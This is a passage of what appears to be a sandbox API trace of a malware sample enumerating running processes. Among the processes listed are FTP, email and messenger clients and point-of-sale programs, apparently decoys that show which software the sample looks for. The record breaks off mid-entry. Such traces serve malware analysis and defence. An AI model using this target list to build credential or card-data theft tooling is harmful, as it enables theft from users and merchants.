th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.227] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.230] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.233] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.235] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.238] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.242] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.244] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0209.247] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0209.254] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0209.257] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0209.259] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.262] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0209.265] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0209.267] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0209.269] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0209.272] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0209.278] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0209.281] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.284] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0209.287] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0209.298] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0209.301] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.304] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0209.306] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0209.309] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0209.312] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0209.314] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0209.317] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0209.320] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0209.323] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0209.325] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0209.328] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0209.331] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0209.350] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0209.353] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0209.356] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0209.359] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0209.361] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0209.364] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0209.366] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0209.369] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0209.371] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0209.375] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0209.377] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0209.379] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0209.382] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0209.415] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0209.420] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0209.423] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0209.425] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0209.428] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0209.431] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0209.434] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0209.437] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0209.439] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0209.442] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0209.444] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0209.446] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0209.448] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0209.451] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0209.534] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0209.537] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0209.539] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0209.541] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0209.543] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0209.545] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0209.547] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0209.549] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0209.552] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0209.554] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0209.557] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0209.559] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0209.561] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0209.563] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0209.565] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0209.632] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0209.635] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0209.637] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0209.639] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0209.641] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0209.644] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0209.646] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0209.648] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0209.650] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0209.652] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, 